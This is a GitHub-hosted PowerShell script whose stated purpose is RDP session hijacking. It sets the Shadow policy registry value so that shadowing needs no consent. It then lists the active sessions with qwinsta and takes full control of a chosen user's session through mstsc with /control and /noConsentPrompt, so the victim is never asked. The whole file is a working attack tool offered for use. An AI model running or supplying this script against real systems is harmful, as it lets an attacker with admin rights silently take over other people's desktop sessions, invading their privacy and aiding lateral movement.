-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathStart-RdpSessionTakeover.ps1
More file actions
72 lines (65 loc) · 2.71 KB
/
Start-RdpSessionTakeover.ps1
File metadata and controls
72 lines (65 loc) · 2.71 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Start-RdpSessionTakeover.ps1
# Originally written by Pyrrh1c 2/22/2021
<#
.Synopsis
This script automates the process of enumerating existing RDP sessions and allows the user to then take over a selected session.
.Description
A short script to automate the process of RDP session hijacking. When run without any parameters it will enumerate all existing RDP sessions and prompt for a session to be taken over. This script requires local admin to run.
.Parameter UserName
If you already know the username of the session you want to take over you can specify it and skip enumeration.
.Example
Start-RdpSessionTakeover.ps1
The default behavior. Enumerats all existing RDP sessions, lists them, prompts for which to take over, then takes over the chosen session.
.Example
Start-RdpSessionTakeover.ps1 -UserName jdoe
Takes over the session for user jdoe without enumerating all sessions.
.Link
http://github.com/pyrrh1c/Start-RdpSessionTakeover
.Link
http://pyrrh1c.net
.Notes
This script is under active development, stay tuned.
#>
# Defining the parameters for the script to run.
Param(
[CmdletBinding(DefaultParameterSetName='UserName')]
[Parameter()]
[String]
$UserName
)
#Requires -RunAsAdministrator
Write-Host "Enabling RDP Shadowing" -ForegroundColor Yellow
$RegPath = $RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"
$Name = "Shadow"
$Value = 2
New-ItemProperty -Path $RegPath -Name $Name -Value $value -PropertyTYpe DWORD -Force
Clear-Host
if ($UserName -eq "")
{
Clear-Host
$Sessions = C:\Windows\System32\qwinsta.exe /server:$ComputerName |
ForEach-Object {
$_.Trim() -replace "\s+",","
} |
ConvertFrom-Csv | ?{($_.SESSIONNAME -notlike '*services*') -And ($_.SESSIONNAME -notlike '*rdp-tcp') -And ($_.USERNAME -notlike '1')}
Write-Host "Current RDP Sessions" -ForegroundColor Yellow
Write-Host "===================="
$i=0
$Sessions | ForEach-Object{Write-Host $i": " $_.USERNAME; $i++}
Write-Host "===================="
$selection = Read-Host "Enter the number of the session to hijack"
Clear-Host
Write-Host "Connecting to Session" ($Sessions[$selection]).USERNAME -ForegroundColor Yellow
mstsc /v:localhost /shadow:($Sessions[$selection]).ID /control /noConsentPrompt
}
else
{
$Sessions = C:\Windows\System32\qwinsta.exe /server:$ComputerName |
ForEach-Object {
$_.Trim() -replace "\s+",","
} |
ConvertFrom-Csv | ?{$_.USERNAME -like $UserName}
Clear-Host
Write-Host "Taking over session for" $UserName -ForegroundColor Yellow
mstsc /v:localhost /shadow:($Sessions[0]).ID /control /noConsentPrompt
}